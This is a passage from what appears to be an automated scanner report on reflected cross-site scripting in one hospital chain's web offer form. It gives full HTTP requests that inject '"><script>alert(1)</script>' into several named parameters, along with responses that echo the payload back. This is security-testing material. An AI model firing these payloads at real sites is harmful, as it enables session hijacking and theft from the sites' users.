GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-841661e9e"><script>alert(1)</script>8361d0a233a &uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.c
om%2525252fmain%2525252foffer%2525253faddr%2525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:23 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=hg9evj4m1q5qnnnvp8ppo8c1g0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-841661e9e"><script>alert(1)</script>8361d0a233a &uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.2...[SNIP]...
2.45. http://www.vcahospitals.com/main/offer [uri parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 922c0"><script>alert(1)</script>c8ab77b4859 was submitted in the uri parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2
525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d922c0"><script>alert(1)</script>c8ab77b4859 &useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK Date: Sat, 05 Mar 2011 12:18:28 GMT Server: Apache/2.2.15 (Win32) PHP/5.2.14 X-Powered-By: PHP/5.2.14 Set-Cookie: PHPSESSID=vrccil3nvdrv3u04cdk943phe3; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Type: text/html Content-Length: 21807 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-...[SNIP]... 52bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d922c0"><script>alert(1)</script>c8ab77b4859 &useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)&variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.46. http://www.vcahospitals.com/main/offer [useragent parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the useragent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ccc8"><script>alert(1)</script>dd190c671a2 was submitted in the useragent parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2
525253d%25252526city%2525253d%25252526date%2525253d1307084400%25252526email%2525253d%25252526fname%2525253d%25252526formtype%2525253dCORP%25252526guid%2525253dFBBB127E-9283-4C9A-8A61-A34D07FC7146%25252526ipaddress%2525253d173.193.214.243%25252526lname%2525253d%25252526newmex%2525253d0%25252526optin%2525253d%25252526other%2525253d%25252526petage%2525253d%25252526petname%2525253d%25252526pettype%2525253d%25252526phone%2525253d%25252526referer%2525253d%25252526state%2525253d%25252526submit%2525253dGet%2525252bFREE%2525252bCoupon%25252526token%2525253d81c834ba6ebffe11ddefbac1e3647bda%25252526tollfree%2525253d866-825-8416%25252526uri%2525253dhttp%252525253a%252525252f%252525252fwww.vcahospitals.com%252525252fmain%252525252foffer%25252526useragent%2525253dMozilla%252525252f4.0%2525252b(compatible%252525253b%2525252bMSIE%2525252b6.0%252525253b%2525252bWindows%2525252bNT%2525252b5.1%252525253b%2525252bSV1%252525253b%2525252b.NET%2525252bCLR%2525252b1.1.4322)%25252526variant%2525253d%25252526zip%2525253d%252526useragent%25253dMozilla%2525252f4.0%25252b(compatible%2525253b%25252bMSIE%25252b6.0%2525253b%25252bWindows%25252bNT%25252b5.1%2525253b%25252bSV1%2525253b%25252b.NET%25252bCLR%25252b1.1.4322)%252526variant%25253d%252526zip%25253d%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%2526variant%253d%2526zip%253d%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)9ccc8"><script>alert(1)</script>dd190c671a2 &variant=&zip= HTTP/1.1 Accept: */* Accept-Language: en-US Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; 
.NET4.0E) Proxy-Connection: Keep-Alive Host: www.vcahospitals.com
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:18:34 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=icsbsqp3afi5ar05hms93sc531; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 21807

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)%26variant%3d%26zip%3d&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322)9ccc8"><script>alert(1)</script>dd190c671a2 &variant=&zip=" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.47. http://www.vcahospitals.com/main/offer [utm_campaign parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the utm_campaign request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f65b"><script>alert(1)</script>14ab4538db8 was submitted in the utm_campaign parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded1f65b"><script>alert(1)</script>14ab4538db8 &gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:36 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=0mlrillum4vu8mp1o97hfbr3r3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded1f65b"><script>alert(1)</script>14ab4538db8 &gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.48. http://www.vcahospitals.com/main/offer [utm_medium parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the utm_medium request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79b9c"><script>alert(1)</script>72b305046a9 was submitted in the utm_medium parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc79b9c"><script>alert(1)</script>72b305046a9 &utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:17 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=baenvd1f3pb9gev61jv8jo9f25; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc79b9c"><script>alert(1)</script>72b305046a9 &utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.49. http://www.vcahospitals.com/main/offer [utm_source parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the utm_source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcfe2"><script>alert(1)</script>09d0de21174 was submitted in the utm_source parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?r=E13&utm_source=googlebcfe2"><script>alert(1)</script>09d0de21174 &utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:07 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=t86j051ojsn7hfvp5cju39eml7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10791

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=googlebcfe2"><script>alert(1)</script>09d0de21174 &utm_medium=ppc&utm_term=vca%20antech&utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.50. http://www.vcahospitals.com/main/offer [utm_term parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the utm_term request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cec13"><script>alert(1)</script>22dd34fcafe was submitted in the utm_term parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antechcec13"><script>alert(1)</script>22dd34fcafe &utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw HTTP/1.1
Host: www.vcahospitals.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.107 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:04:26 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=ul77dhjfgbf0ges117v5r933n7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 10827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-...[SNIP]...
<form action="http://www.vcahospitals.com/main/offer/thank-you.html?r=E13&utm_source=google&utm_medium=ppc&utm_term=vca%20antechcec13"><script>alert(1)</script>22dd34fcafe &utm_campaign=e13geotarget_e13branded&gclid=CNrfoemwt6cCFcbd4Aod8keVAw" method="POST" name="offer-form" id="offer-form" class="input-form">...[SNIP]...
2.51. http://www.vcahospitals.com/main/offer [variant parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.vcahospitals.com
Path: /main/offer
Issue detail
The value of the variant request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83dad"><script>alert(1)</script>b2542e55643 was submitted in the variant parameter. This input was echoed unmodified in the application's response. This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /main/offer?addr=&city=&date=1307084400&email=&fname=&formtype=CORP&guid=0488BA99-5545-4992-912E-EE3E92538798&ipaddress=173.193.214.243&lname=&newmex=0&optin=&other=&petage=&petname=&pettype=&phone=&referer=&state=&submit=Get+FREE+Coupon&token=aa13a28e1773f137e31261bccc5c24bc&tollfree=866-825-8416&uri=http:%2f%2fwww.vcahospitals.com%2fmain%2foffer%3faddr%3d%26city%3d%26date%3d1307084400%26email%3d%26fname%3d%26formtype%3dCORP%26guid%3d95D5FB0B-779F-4D18-9C9E-501AD398C559%26ipaddress%3d173.193.214.243%26lname%3d%26newmex%3d0%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26referer%3d%26state%3d%26submit%3dGet%2bFREE%2bCoupon%26token%3ddda68e64d460e98531171085a5a8ad78%26tollfree%3d866-825-8416%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fmain%252foffer%253faddr%253d%2526city%253d%2526date%253d1307084400%2526email%253d%2526fname%253d%2526formtype%253dCORP%2526guid%253dD4DE5467-1E6D-4C3E-80D6-E52DB1140F3A%2526ipaddress%253d173.193.214.243%2526lname%253d%2526newmex%253d0%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526referer%253d%2526state%253d%2526submit%253dGet%252bFREE%252bCoupon%2526token%253dc6268853c430a181c06a3eda75dae1a1%2526tollfree%253d866-825-8416%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fmain%25252foffer%25253faddr%25253d%252526city%25253d%252526date%25253d1307084400%252526email%25253d%252526fname%25253d%252526formtype%25253dCORP%252526guid%25253d6770E3F2-2A04-4662-AEB3-FE70D3111F6D%252526ipaddress%25253d173.193.214.243%252526lname%25253d%252526newmex%25253d0%252526optin%25253d%252526other%25253d%252526petage%25253d%252526petname%25253d%252526pettype%25253d%252526phone%25253d%252526referer%25253d%252526state%25253d%252526submit%25253dGet%25252bFREE%25252bCoupon%252526token%25253dcdbd8b098f8070e3c19207ef06a5e6e1%252526tollfree%25253d866-825-8416%252526uri%25253dhttp%2525253a%2525252f%2525252fwww.vcahospitals.com%2525252fmain%2525252foffer%2525253faddr%2
